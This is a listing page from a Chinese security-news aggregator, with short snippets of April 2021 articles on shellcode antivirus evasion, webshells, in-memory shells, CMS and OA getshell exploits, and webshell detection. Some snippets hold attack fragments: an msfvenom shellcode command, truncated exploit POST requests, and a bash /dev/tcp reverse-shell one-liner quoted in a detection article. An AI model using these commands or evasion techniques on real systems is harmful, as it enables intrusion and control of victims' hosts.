记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CS shellcode最新免杀

前言    希望大家多多关注本公众号,目前本公众号由本人接手,以前发的内容文章将保留给大家,本人也会更新自己擅长以及一些干货资料无偿分享给大家,其次本公众号将更名为“红队攻防”!!!    1.    在正常的Shellcode加载调用时,会被查杀掉。
发布时间:2021-04-20 09:28 | 阅读:4939 | 评论:0 | 标签:shellcode shell

xHunt的最新攻击手段分析:通过BumbleBee Webshell发起攻击(下)

xHunt的最新攻击手段分析:通过BumbleBee Webshell发起攻击(上)攻击者如何通过BumbleBee发起攻击关于BumbleBee Webshell活动,IIS日志中的重要信息有:HTTP请求的时间戳;攻击者的IP地址;HTTP请求中的用户代理提供了攻击者的操作系统和浏览器版本;URL参数中的ClientId是Exchange服务器通过服务器端cookie提供的客户端的唯一标识符;根据研究人员收集到的日志,附录中的表1提供了有关攻击者使用BumbleBee webshell的活动时间表,该时间表始于2020年2月1日。
发布时间:2021-04-19 15:43 | 阅读:3653 | 评论:0 | 标签:攻击 shell

CS免杀-实现shellcode拉取stage

#免杀技术 12个 一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚Shellcode原理通常我们使用CS生成payload后,都是利用加载器将payload放在内存中运行但payload是如何与CS服务器通信的,我们不是很了解因为生成的payload是一串机器码,没有反汇编能力的很难看懂其中的原理当我网上查资料发现,原来CS生成的shellcode是使用wininet库实现的加载器,用来下载对应的stage(Beacon),并将stage注入到内存中去。
发布时间:2021-04-18 12:39 | 阅读:7096 | 评论:0 | 标签:shellcode shell

FastAdmin前台分片传输上传文件getshell exp

moonsec Author moonsec moonsec 暗月博客 FastAdmin 默认不开启 感觉有点鸡叻  详细分析请看 https://mp.weixin.qq.com/s/gAerDNnDSl6864oyvDy4nA请看视频 注册用户 登录 获取cookies 更改exp的cookies 提交就可以了。
发布时间:2021-04-18 09:59 | 阅读:7467 | 评论:0 | 标签:exp shell

Tomcat学习之无文件Filter内存shell

#网络安全 8 #代码审计 8 #java安全 8 0x01 前言在前一篇,我已经把常规的Filter内存shell给调试分析了一遍,相信大家通过前一篇文章,已经对内存shell有了一定的认知和了解。不过上一篇并非是完美的内存shell,因为需要我们上传一个jsp文件,然后访问写入内存shell,这样就不太符合无文件shell的思想了,所以本篇我们就来分析下无文件的情况下我们该如何写入内存shell。0x02 Filter调试分析01 必备预习知识点在将Filter无文件内存马实现之前,我们先来巩固几个小知识点,辅助我们理解后面的内容。
发布时间:2021-04-17 18:12 | 阅读:9161 | 评论:0 | 标签:学习 shell 内存

【New】致远 OA 组合 getshell

文章作者: Li qun 文章链接: https://www.ailiqun.xyz/2021/04/10/%E8%87%B4%E8%BF%9COA-%E7%BB%84%E5%90%88getshell/ 版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。
发布时间:2021-04-17 10:18 | 阅读:11550 | 评论:0 | 标签:shell

FastAdmin前台分片传输上传文件getshell复现

#漏洞复现文章合集 87个 上方蓝色字体关注我们,一起学安全!作者:Whippet@Timeline Sec本文字数:1624阅读时长:5~6min声明:请勿用作违法用途,否则后果自负0x01 简介FastAdmin 是一款基于 ThinkPHP 5 + Bootstrap 的极速后台开发框架。致力于服务开发者,快速搭建自己属于自己的后台。0x02 漏洞概述2021年3月28日,360漏洞云漏洞研究员发现,FastAdmin框架存在有条件RCE漏洞,由于FastAdmin的前台文件上传功能中提供了分片传输功能, 但在合并分片文件时因对文件路径的拼接处理不当导致可上传任意文件。
发布时间:2021-04-17 10:18 | 阅读:10507 | 评论:0 | 标签:shell

代码审计之eyouCMS最新版getshell漏洞

奇安信攻防社区试运营试运营阶段发布、转载、互动皆有惊喜!奇安信攻防社区是一个开放的社区,希望通过分享促进攻防技术的切磋与交流,以分享促成长,提升实战化攻防技术。扫码二维码体验forum.butian.net利用思路前台设置一个管理员的session后台远程插件下载文件包含getshell。前台设置管理员session在application/api/controller/Ajax.php:219get_token函数是可以前台随意调用的,另外形参中的$name变量也是通过http传递进来的。跟进token函数,如下图所示。
发布时间:2021-04-16 23:49 | 阅读:10843 | 评论:0 | 标签:cms 漏洞 审计 shell

FBI清除了数百家网站中利用ProxyLogon漏洞的webshell

美联储已经从美国数百台容易受到攻击的电脑中清除了恶意的webshell文件,黑客都是通过被称为ProxyLogon Microsoft Exchange的漏洞来入侵主机的。ProxyLogon由一组安全漏洞组成,这些漏洞会影响到微软内部版本的Exchange Server软件中的电子邮件系统。微软上个月警告说,这些漏洞正在被Hafnium高级持续性威胁(APT)组织大量利用;之后,其他研究人员也表示,还有10个甚至更多的APT组织也在利用这些漏洞进行攻击。
发布时间:2021-04-16 11:25 | 阅读:8348 | 评论:0 | 标签:漏洞 shell

Chrome 0day 自定义shellcode 利用(详细)

该漏洞主要利用在-no-sandbox 模式下,也是有利用场景的,具体要看各位师傅怎么发挥啦!漏洞影响范围利用条件:未开启沙盒、 X86架构CPU 如Intel、AMD等、浏览器需运行在64位模式、1.生成shellcodemsfvenom -a x64 -p windows/x64/exec CMD="msg.exe 1 By EDI" EXITFUNC=thread -f num当然你也可以选择使用CS的shellcode 进行上线,我这里只是为了做测试,所以只弹了个msg 师傅们也可以修改cmd值的内容,生成shellcode ,进行下载执行,加账户等操作。
发布时间:2021-04-15 21:34 | 阅读:18227 | 评论:0 | 标签:0day shellcode shell

从流量中检测 WebShell 的方法 | 经验分享

微步在线研究响应中心 Author 小明 微步在线研究响应中心 神秘,低调,手里全是情报。中国网络安全圈不可缺少的力量。 1背景众所周知,攻防演练过程中,攻击队入侵企业网站时,通常要通过各种方式获取 webshell,从而获得企业网站的控制权,然后方便实施之后的入侵行为。在冰蝎、哥斯拉这类加密型 webshell 工具出现之前,中国菜刀、蚁剑这类工具常被攻击队使用,与菜刀和蚁剑不同,冰蝎和哥斯拉使用加密隧道传输数据,不易被安全设备发现,同时,无文件内存 webshell 的兴起,给检测带来了更大的压力。因此,对这类加密型 webshell 和无文件内存 webshell 的检测是非常有必要的。
发布时间:2021-04-15 21:34 | 阅读:7861 | 评论:0 | 标签:shell

致远OA A8 HtmlOfficeServlet前台GetShell 分析

#红队 9 #渗透测试 12 #黑客 12 #网络安全 12 #漏洞 12 全文共计3127个字,预计阅读时长10分钟这是一个历史漏洞了,前台即可getshell。下面开始漏洞分析HtmlOfficeServlet在web.xml下存在这么三个servlet,这三个servlet都是未授权的,其中我们重点关注下HtmlOfficeServlet在doGet方法一开始通过xml加载bean的形式,拿到实例化对象。
发布时间:2021-04-15 16:17 | 阅读:9775 | 评论:0 | 标签:shell

java执行shellcode的几种方法

在后渗透中常常需要cobaltstrike工具。而向已攻破的服务器注入一段cobaltStrike的shellcode是最便捷的上线方法。偏偏java这种语言屏蔽了很多操作系统的底层细节,注入shellcode又是偏底层的方法。分享一下java注入shellcode的几种方法1. JNIjava是不可以调用使用c/c++的函数,为了兼容以及其他方面的考虑,JVM可以通过JNI去调用c等函数。我们需要写一个c文件,按照JNI规范写好函数。函数从java中接收参数,并交给dll去处理。
发布时间:2021-04-15 16:17 | 阅读:4831 | 评论:0 | 标签:java shellcode shell 执行

智能电视漏洞挖掘初探之 Getshell

    上周发了一篇智能电视历史漏洞的文章,这周来分享一下智能电视的攻击点以及怎么上手。智能电视不仅仅是用来看电视的,也可以是智能家居的枢纽。电视不是单独的存在,还能与手机、智能家居进行互动。正是由于应用场景的不断拓展,安全问题也逐渐显露。想象一下“ 你在看电视,电视却在看你 ”的诡异画面。曾有新闻报道,自己家电视的播放不受控制,莫名其妙的播放了一些奇奇怪怪的东西。这是怎么一回事儿呢,我们首先来了解一下电视。一般人很少全面的了解智能电视,一般就用刷刷剧,其中有不少人甚至不会用 DLNA 投屏服务。下面来看看,在挖掘智能电视漏洞之前需要了解的基础信息。
发布时间:2021-04-15 11:05 | 阅读:6476 | 评论:0 | 标签:漏洞 shell 智能

FBI“合法清除”被攻击的Exchange服务器WebShell

#威胁情报 22个 2021年1月到2月,有黑客组织使用Microsoft Exchange邮件服务器软件中的0day漏洞利用链(ProxyLogon)来访问电子邮件账户,并在服务器放置WebShell进行远程权限管理。在漏洞和补丁发布后,其他黑客组织也于3月初开始效仿,纷纷针对Exchange服务器进行攻击。尽管许多受感染的系统所有者成功地从数千台计算机中删除了WebShell,但还是有数百个台服务器上运行着WebShell。
发布时间:2021-04-15 11:05 | 阅读:4857 | 评论:0 | 标签:攻击 shell

FBI“合法清除”被攻击Exchange服务器上的WebShell

2021年1月到2月,有黑客组织使用Microsoft Exchange邮件服务器软件中的0day漏洞利用链(ProxyLogon)来访问电子邮件账户,并在服务器放置WebShell进行远程权限管理。在漏洞和补丁发布后,其他黑客组织也于3月初开始效仿,纷纷针对Exchange服务器进行攻击。尽管许多受感染的系统所有者成功地从数千台计算机中删除了WebShell,但还是有数百个台服务器上运行着WebShell。
发布时间:2021-04-15 10:58 | 阅读:6656 | 评论:0 | 标签:攻击 shell

xHunt的最新攻击手段分析:通过BumbleBee Webshell发起攻击(上)

2020年9月,Palo Alto Networks 的网络安全研究人员开始对科威特一家组织的Microsoft Exchange服务器进行调查,该组织在持续的xHunt攻击中受到攻击组织的持续攻击。研究人员在这项调查中发现了两个新的后门,分别称为TriFive和Snugy,以及一个名为BumbleBee的新Webshell漏洞,研究人员将在此文中对其进行详细说明。
发布时间:2021-04-14 12:07 | 阅读:4937 | 评论:0 | 标签:攻击 shell

蓝队的自我修养之如何从流量中检测 WebShell | 攻防实战经验分享

#攻防实战经验 3个 1背景众所周知,攻防演练过程中,攻击队入侵企业网站时,通常要通过各种方式获取 webhell,从而获得企业网站的控制权,然后方便实施之后的入侵行为。在冰蝎、哥斯拉这类加密型 webshell 工具出现之前,中国菜刀、蚁剑这类工具常被攻击队使用,与菜刀和蚁剑不同,冰蝎和哥斯拉使用加密隧道传输数据,不易被安全设备发现,同时,无文件内存 webshell 的兴起,给检测带来了更大的压力。因此,对这类加密型 webshell 和无文件内存 webshell 的检测是非常有必要的。2难点当前,这类加密型 webshell 检测存在以下难点:使用加密隧道传输数据,无明文通讯特征。
发布时间:2021-04-12 22:42 | 阅读:10725 | 评论:0 | 标签:shell 攻防

深度分析CobaltStrike(一)—— Beacon生成流程及Shellcode分析

 项目框架首先拿到网上流传的破解版CobaltStrike4.1,并针对项目进行反编译,可以看到项目目录如下代码目录较多,由于需要分析的是Beacon的生成,因此
发布时间:2021-04-12 15:23 | 阅读:11205 | 评论:0 | 标签:shellcode shell

实战 | 一次简单的信息收集到getshell的过程

前言申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!本篇文章是4月份活动的投稿文章来自M78团队的伊电童姐姐以下是M
发布时间:2021-04-10 12:50 | 阅读:11678 | 评论:0 | 标签:shell

致远OA 前台getshell 复现

首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests
发布时间:2021-04-09 18:54 | 阅读:46808 | 评论:0 | 标签:shell

webshell下起PS进程

#免杀技术 10个 一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚WebShell下起PowerShell进程一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一一再不久的几天前写了几个绕过360、火绒等杀软的PS上线CS的文章啊。《CS免杀-PowerShell上线》《CS免杀-PowerShell加载命令免杀》但是发现360、火绒等这几个小天才啊,拦截了在webshell下起powershell进程真的是烦啊一一一一一今天只测试了360全家桶、火绒就自测吧。win10环境,用哥斯拉生成的webshell执行powershell命令。
发布时间:2021-04-09 13:11 | 阅读:9936 | 评论:0 | 标签:shell

Tomcat内存shell学习之Filter

#网络安全 7 #代码审计 7 #java安全 7 0x01 前言说到内存shell,也就是这几年才兴起来的吧,当时刚了解的时候觉得还蛮酷的,无文件就可以实现shell功能。碍于当时学习计划的问题,没有去研究这方面的技术,现在抽空来学习一下,做个笔记,留作日后复习。我也是踩在巨人的肩膀上学习的,还是很感谢大佬们的分享,以下是结合了本人自己的理解去阐述这个知识点,如果写的不好的地方,还望多多包涵。
发布时间:2021-04-09 10:33 | 阅读:6550 | 评论:0 | 标签:学习 shell 内存

反弹shell之升级交互shell

#反弹Shell 5个 △△△点击上方“蓝字”关注我们了解更多精彩0x00 简介大家好,我依旧是NOVASEC最菜的酒零本文主要补充一下普通反向shell升级为交互shell在大多数情况下,反弹出来的shell都是非交互式的,拥有不能进行交互输入,看不到命令执行的结果等等的缺点。
发布时间:2021-04-08 18:48 | 阅读:8512 | 评论:0 | 标签:shell

帆软 V9 getshell

注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: POST /WebReport/ReportServer?op=svginit&
发布时间:2021-04-08 14:00 | 阅读:45780 | 评论:0 | 标签:shell

反弹shell--whois命令

#权限维持 9个 一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚WHOISwhois命令通常是用来查询网站信息的但它
发布时间:2021-04-08 13:34 | 阅读:8793 | 评论:0 | 标签:shell

记一次SSRF->getshell网赌平台

个是2个月前的项目,思路也是挺简单的,还是给兄弟们分享分享,首先还是常规的站点,我们进去看看可以看见这个网站为thinkphp,当然,当时就很开心,因为自己打tp的站打的太多了,然后再进一步细看。我们可以得知这个web站点的版本为tp3.2.3。当时的思路为如下。第一,找xss,找到cookie找到后台,然后tp3.2.3缓存拿下第二,找注入,出账号密码,进入后台,然后tp3.2.3缓存拿下。第三,找登录日志,fuzzing出日志,然后拿到后台账号和密码,这三种思路在找洞的过程中,并没有找到xss和sql注入,所以,我们这边就把思路锁定在了日志身上。
发布时间:2021-04-08 10:55 | 阅读:8470 | 评论:0 | 标签:ssrf shell

webshell免杀的技巧

0x00:前言由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。
发布时间:2021-04-07 08:35 | 阅读:11286 | 评论:0 | 标签:shell

HIDS-Agent开发之检测反弹shell

 介绍bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 #TCPListener:nc -nvlp 1234目标机执行后的结果如下:创建了一个常住进程“bash -i”, 它的得0和1文件描述符都指向socket。
发布时间:2021-04-06 12:02 | 阅读:11209 | 评论:0 | 标签:shell

免杀Tips--利用GUID来加载shellcode

 前几天,很多的公众号都复现了来自Lazarus组织的加载器的实现方法,UUID法,具体链接可以查看:https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/,然后今天带来一个类似的方法,即使用GUID来加载shellcode。原文链接可点击原文链接查看。
发布时间:2021-04-05 22:14 | 阅读:15502 | 评论:0 | 标签:shellcode shell

公告

❤永久免费的Hackdig,帮你成为掌握黑客技术的英雄

🧚 🤲 🧜

标签云

本页关键词